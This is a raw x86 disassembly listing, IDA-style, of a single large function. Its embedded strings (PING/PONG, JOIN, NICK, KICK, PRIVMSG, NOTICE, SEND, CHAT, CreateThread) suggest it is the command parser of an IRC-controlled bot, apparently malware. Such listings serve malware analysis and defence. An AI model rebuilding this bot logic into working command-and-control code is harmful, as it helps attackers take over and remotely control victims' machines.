var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = byte ptr -2658h
var_25D8 = byte ptr -25D8h
var_24D8 = byte ptr -24D8h
var_23D8 = dword ptr -23D8h
var_23D4 = dword ptr -23D4h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = byte ptr -23B0h
var_2330 = byte ptr -2330h
var_22B0 = byte ptr -22B0h
var_2230 = dword ptr -2230h
var_222C = dword ptr -222Ch
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = byte ptr -221Ch
var_219C = byte ptr -219Ch
var_211C = byte ptr -211Ch
var_209C = dword ptr -209Ch
var_2098 = dword ptr -2098h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = byte ptr -2088h
var_2008 = byte ptr -2008h
var_1F88 = byte ptr -1F88h
var_1F08 = dword ptr -1F08h
var_1F04 = dword ptr -1F04h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = byte ptr -1EF4h
var_1DF4 = byte ptr -1DF4h
var_1D74 = dword ptr -1D74h
var_1D6C = dword ptr -1D6Ch
var_1D68 = dword ptr -1D68h
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D50 = byte ptr -1D50h
var_1D3C = byte ptr -1D3Ch
var_1C38 = byte ptr -1C38h
var_1BB4 = dword ptr -1BB4h
var_1BB0 = dword ptr -1BB0h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1B9C = byte ptr -1B9Ch
var_1B88 = byte ptr -1B88h
var_1A84 = byte ptr -1A84h
var_1A04 = dword ptr -1A04h
var_1A00 = dword ptr -1A00h
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = byte ptr -19ECh
var_196C = byte ptr -196Ch
var_192C = byte ptr -192Ch
var_182C = dword ptr -182Ch
var_1828 = dword ptr -1828h
var_181C = dword ptr -181Ch
var_1818 = dword ptr -1818h
var_1814 = dword ptr -1814h
var_1810 = byte ptr -1810h
var_17D8 = byte ptr -17D8h
var_17A0 = byte ptr -17A0h
var_1784 = byte ptr -1784h
var_1780 = byte ptr -1780h
var_1700 = byte ptr -1700h
var_16C0 = byte ptr -16C0h
var_1630 = dword ptr -1630h
var_162C = dword ptr -162Ch
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = byte ptr -161Ch
var_159C = byte ptr -159Ch
var_151C = dword ptr -151Ch
var_1518 = dword ptr -1518h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = byte ptr -150Ch
var_14FC = byte ptr -14FCh
var_147C = byte ptr -147Ch
var_13FC = dword ptr -13FCh
var_13F4 = dword ptr -13F4h
var_13F0 = dword ptr -13F0h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = byte ptr -13DCh
var_135C = byte ptr -135Ch
var_12DC = byte ptr -12DCh
var_125C = dword ptr -125Ch
var_1258 = dword ptr -1258h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_1238 = byte ptr -1238h
var_11B8 = byte ptr -11B8h
var_1138 = dword ptr -1138h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_1128 = dword ptr -1128h
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_1094 = byte ptr -1094h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1004 = dword ptr -1004h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = byte ptr -0FF0h
var_F70 = dword ptr -0F70h
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = byte ptr -0F5Ch
var_EDC = dword ptr -0EDCh
var_ED8 = dword ptr -0ED8h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = byte ptr -0EC8h
var_E48 = dword ptr -0E48h
var_E44 = dword ptr -0E44h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = byte ptr -0E38h
var_DB8 = byte ptr -0DB8h
var_D98 = byte ptr -0D98h
var_D88 = dword ptr -0D88h
var_D84 = byte ptr -0D84h
var_D04 = byte ptr -0D04h
var_C84 = dword ptr -0C84h
var_C80 = dword ptr -0C80h
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = byte ptr -0C5Ch
var_BDC = dword ptr -0BDCh
var_BD8 = dword ptr -0BD8h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = byte ptr -0BCCh
var_B4C = dword ptr -0B4Ch
var_B48 = dword ptr -0B48h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = byte ptr -0B34h
var_AB4 = dword ptr -0AB4h
var_AB0 = dword ptr -0AB0h
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = byte ptr -0A9Ch
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_984 = word ptr -984h
var_980 = dword ptr -980h
var_978 = dword ptr -978h
var_974 = dword ptr -974h
var_970 = dword ptr -970h
var_968 = byte ptr -968h
var_907 = byte ptr -907h
var_906 = byte ptr -906h
var_904 = byte ptr -904h
var_903 = byte ptr -903h
var_8FA = byte ptr -8FAh
var_8F8 = byte ptr -8F8h
var_8F6 = byte ptr -8F6h
var_8F5 = byte ptr -8F5h
var_868 = byte ptr -868h
var_858 = byte ptr -858h
var_7D8 = byte ptr -7D8h
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_698 = dword ptr -698h
var_690 = dword ptr -690h
var_68C = dword ptr -68Ch
var_688 = dword ptr -688h
var_680 = dword ptr -680h
var_67C = dword ptr -67Ch
var_678 = dword ptr -678h
var_670 = dword ptr -670h
var_644 = dword ptr -644h
var_640 = word ptr -640h
var_62C = dword ptr -62Ch
var_628 = byte ptr -628h
var_5A8 = byte ptr -5A8h
var_598 = dword ptr -598h
var_594 = dword ptr -594h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_57C = dword ptr -57Ch
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D0 = byte ptr -4D0h
var_4C4 = byte ptr -4C4h
var_48C = byte ptr -48Ch
var_47C = byte ptr -47Ch
var_3FC = byte ptr -3FCh
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_340 = byte ptr -340h
var_324 = word ptr -324h
var_322 = word ptr -322h
var_320 = dword ptr -320h
var_314 = byte ptr -314h
var_310 = dword ptr -310h
var_304 = byte ptr -304h
var_300 = byte ptr -300h
var_2FC = dword ptr -2FCh
var_2F0 = byte ptr -2F0h
var_2EC = byte ptr -2ECh
var_2EB = byte ptr -2EBh
var_2EA = byte ptr -2EAh
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = byte ptr -2D0h
var_D0 = byte ptr -0D0h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_A6 = byte ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_5C = dword ptr -5Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov eax, 5D90h
lea ebp, [esp-4Ch]
call sub_41EA20
push ebx
push esi
xor ebx, ebx
mov esi, 200h
push esi
lea eax, [ebp+4Ch+var_2D0]
push ebx
push eax
mov [ebp+4Ch+var_20], 3
mov [ebp+4Ch+var_1C], ebx
mov [ebp+4Ch+var_14], ebx
mov [ebp+4Ch+var_C], ebx
mov [ebp+4Ch+var_4], ebx
mov [ebp+4Ch+var_8], ebx
call sub_41E5F0
push 1Bh
push [ebp+4Ch+arg_10]
lea eax, [ebp+4Ch+var_340]
push eax
call sub_41E860
add esp, 18h
cmp [ebp+4Ch+arg_0], ebx
jnz short loc_4027AA
xor eax, eax
inc eax
jmp loc_402B96
; ---------------------------------------------------------------------------
loc_4027AA: ; CODE XREF: sub_40274D+53�j
push edi
push esi
lea eax, [ebp+4Ch+var_4590]
push ebx
push eax
call sub_41E5F0
mov esi, 1FFh
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_4590]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_4590]
push offset asc_42FCE4 ; " :"
push eax
call sub_41F090
mov [ebp+4Ch+var_18], eax
push esi
lea eax, [ebp+4Ch+var_4590]
push eax
lea eax, [ebp+4Ch+var_4AF8]
push eax
call sub_41E860
mov esi, offset asc_42FCE0 ; " "
lea eax, [ebp+4Ch+var_4AF8]
push esi
push eax
call sub_41E7B2
xor edi, edi
add esp, 34h
mov [ebp+4Ch+var_A4], eax
inc edi
loc_402811: ; CODE XREF: sub_40274D+D5�j
push esi
push ebx
call sub_41E7B2
mov [ebp+edi*4+4Ch+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_402811
mov esi, [ebp+4Ch+var_A4]
cmp esi, ebx
jz loc_402B92
cmp [ebp+4Ch+var_A0], ebx
jz loc_402B92
push 100h
lea eax, [ebp+4Ch+var_968]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push 1Fh
pop edx
loc_402850: ; CODE XREF: sub_40274D+131�j
lea ecx, [ebp+edx*4+4Ch+var_A4]
mov eax, [ecx]
cmp eax, ebx
jz short loc_40287D
cmp byte ptr [eax], 2Dh
jnz short loc_402880
cmp [eax+2], bl
jnz short loc_402880
movsx esi, byte ptr [eax+1]
mov [ebp+esi+4Ch+var_968], 1
mov [eax], bl
mov [eax+1], bl
mov [ecx], ebx
mov esi, [ebp+4Ch+var_A4]
mov [eax+2], bl
loc_40287D: ; CODE XREF: sub_40274D+10B�j
dec edx
jns short loc_402850
loc_402880: ; CODE XREF: sub_40274D+110�j
; sub_40274D+115�j
xor edi, edi
inc edi
cmp [ebp+4Ch+var_8F5], bl
jz short loc_40288E
mov [ebp+4Ch+var_C], edi
loc_40288E: ; CODE XREF: sub_40274D+13C�j
cmp [ebp+4Ch+var_8FA], bl
jz short loc_40289C
mov [ebp+4Ch+var_C], ebx
mov [ebp+4Ch+var_4], edi
loc_40289C: ; CODE XREF: sub_40274D+147�j
cmp byte ptr [esi], 0Ah
jz short loc_4028D6
push 7Fh
lea eax, [ebp+4Ch+var_E38]
push esi
push eax
call sub_41E860
push 17h
lea eax, [esi+1]
push eax
lea eax, [ebp+4Ch+var_D0]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_D0]
push offset asc_42FCDC ; "!"
push eax
call sub_41E7B2
add esp, 20h
loc_4028D6: ; CODE XREF: sub_40274D+152�j
push esi
push offset aPing ; "PING"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402922
push [ebp+4Ch+var_A0]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
mov eax, [ebp+4Ch+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz short loc_40291B
push [ebp+4Ch+arg_C]
push [ebp+4Ch+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
add esp, 10h
loc_40291B: ; CODE XREF: sub_40274D+1B6�j
; sub_40274D+224�j ...
mov eax, edi
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_402922: ; CODE XREF: sub_40274D+198�j
mov esi, [ebp+4Ch+var_A0]
push esi
push offset a001 ; "001"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A21D
push esi
push offset a005 ; "005"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A21D
push esi
push offset a302 ; "302"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402987
push offset a@ ; "@"
push [ebp+4Ch+var_98]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40291B
push 9Fh
inc eax
push eax
push [ebp+4Ch+arg_1C]
call sub_41E860
add esp, 0Ch
jmp short loc_40291B
; ---------------------------------------------------------------------------
loc_402987: ; CODE XREF: sub_40274D+211�j
push esi
push offset a433 ; "433"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4029C5
push ebx
push ds:dword_43C098
push ds:dword_43C094
push [ebp+4Ch+arg_10]
call sub_40AB83
push [ebp+4Ch+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
add esp, 1Ch
jmp loc_40291B
; ---------------------------------------------------------------------------
loc_4029C5: ; CODE XREF: sub_40274D+249�j
mov esi, [ebp+4Ch+arg_18]
mov [ebp+4Ch+var_24], 3
mov edi, 80h
loc_4029D4: ; CODE XREF: sub_40274D+2A6�j
lea eax, [ebp+4Ch+var_E38]
push eax
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4029EE
mov [ebp+4Ch+var_14], 1
loc_4029EE: ; CODE XREF: sub_40274D+298�j
add esi, edi
dec [ebp+4Ch+var_24]
jnz short loc_4029D4
mov esi, [ebp+4Ch+var_A0]
push esi
push offset aKick ; "KICK"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402AC4
mov esi, [ebp+4Ch+arg_18]
mov [ebp+4Ch+arg_0], 3
loc_402A17: ; CODE XREF: sub_40274D+343�j
cmp [esi], bl
jz short loc_402A8B
push 7Fh
lea eax, [ebp+4Ch+var_E38]
push esi
push eax
call sub_41E860
add esp, 0Ch
cmp [ebp+4Ch+var_98], ebx
jz short loc_402A8B
push [ebp+4Ch+var_98]
lea eax, [ebp+4Ch+var_D0]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402A8B
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FC70
push eax
mov [esi], bl
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
lea eax, [ebp+4Ch+var_D0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
add esp, 20h
loc_402A8B: ; CODE XREF: sub_40274D+2CC�j
; sub_40274D+2E3�j ...
add esi, edi
dec [ebp+4Ch+arg_0]
jnz short loc_402A17
push [ebp+4Ch+var_98]
push [ebp+4Ch+arg_10]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402B92
push [ebp+4Ch+arg_C]
mov eax, [ebp+4Ch+arg_20]
push [ebp+4Ch+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_402AB7: ; CODE XREF: sub_40274D+58A�j
; sub_40274D+7FC�j ...
push [ebp+4Ch+arg_4]
call sub_4011F5
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_40274D+2BA�j
push esi
push offset aNick ; "NICK"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402BFD
mov eax, [ebp+4Ch+var_9C]
mov esi, [ebp+4Ch+arg_18]
inc eax
mov [ebp+4Ch+arg_0], eax
mov [ebp+4Ch+var_20], 3
loc_402AEA: ; CODE XREF: sub_40274D+3EF�j
lea eax, [ebp+4Ch+var_E38]
push eax
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402B37
lea eax, [ebp+4Ch+var_E38]
push 21h
push eax
call sub_41EFD0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+4Ch+var_14], eax
jz short loc_402B37
push [ebp+4Ch+arg_0]
lea edi, [esi+2]
lea eax, [edi-1]
push eax
mov byte ptr [esi], 3Ah
call sub_41EEC0
push [ebp+4Ch+var_14]
push edi
call sub_41EED0
add esp, 10h
mov edi, 80h
loc_402B37: ; CODE XREF: sub_40274D+3AE�j
; sub_40274D+3C5�j
add esi, edi
dec [ebp+4Ch+var_20]
jnz short loc_402AEA
cmp [ebp+4Ch+arg_0], ebx
jz short loc_402B92
push [ebp+4Ch+arg_10]
lea eax, [ebp+4Ch+var_D0]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402B6A
push 0Fh
push [ebp+4Ch+arg_0]
push [ebp+4Ch+arg_10]
call sub_41E860
jmp loc_404199
; ---------------------------------------------------------------------------
loc_402B6A: ; CODE XREF: sub_40274D+409�j
mov edi, [ebp+4Ch+arg_18]
xor esi, esi
loc_402B6F: ; CODE XREF: sub_40274D+443�j
cmp [edi], bl
jz short loc_402B86
lea eax, [ebp+4Ch+var_E38]
push eax
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_402B9D
loc_402B86: ; CODE XREF: sub_40274D+424�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402B6F
loc_402B92: ; CODE XREF: sub_40274D+DC�j
; sub_40274D+E5�j ...
xor eax, eax
inc eax
loc_402B95: ; CODE XREF: sub_40274D+1D0�j
; sub_40274D+222F�j ...
pop edi
loc_402B96: ; CODE XREF: sub_40274D+58�j
pop esi
pop ebx
add ebp, 4Ch
leave
retn
; ---------------------------------------------------------------------------
loc_402B9D: ; CODE XREF: sub_40274D+437�j
lea eax, [ebp+4Ch+var_E38]
push 21h
push eax
call sub_41EFD0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+4Ch+var_20], eax
jz short loc_402B92
push eax
call sub_41E1C0
push [ebp+4Ch+arg_0]
mov edi, eax
call sub_41E1C0
add edi, eax
cmp edi, 7Eh
pop ecx
pop ecx
ja short loc_402B92
push [ebp+4Ch+var_20]
shl esi, 7
push [ebp+4Ch+arg_0]
add esi, [ebp+4Ch+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_41E6A6
push ebx
push ebx
lea eax, [ebp+4Ch+var_45F4]
push eax
push [ebp+4Ch+arg_8]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 24h
jmp short loc_402B92
; ---------------------------------------------------------------------------
loc_402BFD: ; CODE XREF: sub_40274D+386�j
push esi
push offset aPart ; "PART"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_402C1F
push esi
push offset aQuit ; "QUIT"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402C43
loc_402C1F: ; CODE XREF: sub_40274D+4BF�j
mov edi, [ebp+4Ch+arg_18]
xor esi, esi
loc_402C24: ; CODE XREF: sub_40274D+4F4�j
cmp [edi], bl
jz short loc_402C37
push [ebp+4Ch+var_A4]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_402C81
loc_402C37: ; CODE XREF: sub_40274D+4D9�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402C24
loc_402C43: ; CODE XREF: sub_40274D+4D0�j
push [ebp+4Ch+var_A0]
push offset a353 ; "353"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402CDC
push [ebp+4Ch+var_94]
push [ebp+4Ch+arg_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402C74
mov eax, [ebp+4Ch+arg_20]
mov dword ptr [eax], 1
loc_402C74: ; CODE XREF: sub_40274D+51C�j
push [ebp+4Ch+var_94]
push offset unk_42FC1C
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_402C81: ; CODE XREF: sub_40274D+4E8�j
mov eax, [ebp+4Ch+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FBF8
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
push [ebp+4Ch+var_A0]
push offset aPart ; "PART"
call sub_41E990
add esp, 18h
test eax, eax
jnz loc_402B92
lea eax, [ebp+4Ch+var_2D0]
push eax
mov eax, [ebp+4Ch+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402CDC: ; CODE XREF: sub_40274D+507�j
push [ebp+4Ch+var_A0]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
mov edi, offset aNotice ; "NOTICE"
jz short loc_402D27
push [ebp+4Ch+var_A0]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_402D27
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_404979
cmp ds:dword_43C084, ebx
jz loc_404979
loc_402D27: ; CODE XREF: sub_40274D+5A6�j
; sub_40274D+5B5�j
push [ebp+4Ch+var_A0]
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_402E83
push [ebp+4Ch+var_A0]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_402E83
mov eax, [ebp+4Ch+var_98]
inc [ebp+4Ch+var_94]
mov [ebp+4Ch+var_20], 4
mov [ebp+4Ch+var_9C], eax
loc_402D5D: ; CODE XREF: sub_40274D+7D7�j
; sub_40274D+810�j ...
mov esi, [ebp+4Ch+var_20]
shl esi, 2
lea edi, [ebp+esi+4Ch+var_A4]
mov eax, [edi]
push eax
push offset dword_42FBEC
mov [ebp+4Ch+var_10], eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4030EC
push [ebp+esi+4Ch+var_A0]
push offset aSend_0 ; "SEND"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402FC0
cmp [ebp+4Ch+var_14], ebx
jz loc_402F9C
push [ebp+esi+4Ch+var_9C]
mov edi, offset aS ; "%s"
lea eax, [ebp+4Ch+var_1B88]
push edi
push eax
call sub_41E6A6
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_1B9C]
push edi
push eax
call sub_41E6A6
push [ebp+esi+4Ch+var_94]
call sub_41E7AD
mov [ebp+4Ch+var_1A04], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1BA4], eax
push 7Fh
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_1A84]
push eax
call sub_41E860
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_19FC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_19F8], eax
lea eax, [ebp+4Ch+var_1A84]
push eax
lea eax, [ebp+4Ch+var_1B88]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FBB4
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 1Ah
push eax
call sub_40AE85
add esp, 44h
mov [ebp+4Ch+var_1A00], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1BA4]
push eax
push offset word_418CEA
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1A00]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz loc_402F8F
loc_402E72: ; CODE XREF: sub_40274D+7473�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42FB78
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_402E83: ; CODE XREF: sub_40274D+5E7�j
; sub_40274D+5FA�j
push [ebp+4Ch+var_A0]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_402E99
mov [ebp+4Ch+var_4], 1
loc_402E99: ; CODE XREF: sub_40274D+743�j
cmp [ebp+4Ch+var_9C], ebx
jz loc_402B92
push offset dword_42FB74
push [ebp+4Ch+var_9C]
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_402EBA
cmp [ebp+4Ch+var_4], ebx
jz short loc_402EC3
loc_402EBA: ; CODE XREF: sub_40274D+766�j
lea eax, [ebp+4Ch+var_D0]
mov [ebp+4Ch+var_9C], eax
loc_402EC3: ; CODE XREF: sub_40274D+76B�j
cmp [ebp+4Ch+var_98], ebx
jz loc_402B92
inc [ebp+4Ch+var_98]
jz short loc_402F01
cmp [ebp+4Ch+arg_10], ebx
jz short loc_402F01
lea eax, [ebp+4Ch+var_340]
push eax
call sub_41E1C0
push eax
push [ebp+4Ch+var_98]
lea eax, [ebp+4Ch+var_340]
push eax
call sub_41EE80
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+4Ch+var_20], eax
jmp short loc_402F04
; ---------------------------------------------------------------------------
loc_402F01: ; CODE XREF: sub_40274D+782�j
; sub_40274D+787�j
mov eax, [ebp+4Ch+var_20]
loc_402F04: ; CODE XREF: sub_40274D+7B2�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+4Ch+var_A4]
cmp edi, ebx
jz loc_402B92
push edi
push offset dword_42FB68
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402D5D
mov ecx, [ebp+4Ch+var_9C]
cmp byte ptr [ecx], 23h
jz short loc_402F4E
mov eax, ds:dword_4D1FE0
mov eax, ds:off_43C168[eax*4]
cmp [eax], bl
jz short loc_402F4E
push eax
push ecx
push offset dword_42FB4C
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402F4E: ; CODE XREF: sub_40274D+7E3�j
; sub_40274D+7F3�j
push edi
push offset dword_42FB44
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_402D5D
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz loc_402D5D
mov eax, [ebp+4Ch+var_9C]
cmp byte ptr [eax], 23h
jz loc_402D5D
push esi
push eax
push offset dword_42FB2C
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402F87: ; CODE XREF: sub_40274D+848�j
push 32h
call ds:dword_42B014 ; Sleep
loc_402F8F: ; CODE XREF: sub_40274D+71F�j
cmp [ebp+4Ch+var_19F4], ebx
jz short loc_402F87
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_402F9C: ; CODE XREF: sub_40274D+64F�j
lea eax, [ebp+4Ch+var_D0]
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FAE8
push eax
call sub_41E6A6
add esp, 10h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_402FC0: ; CODE XREF: sub_40274D+646�j
push [ebp+esi+4Ch+var_A0]
push offset aChat ; "CHAT"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_403102
cmp [ebp+4Ch+var_14], ebx
jz loc_4030DB
push 1Bh
call sub_40B075
test eax, eax
pop ecx
jnz loc_4030CA
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_2AB0]
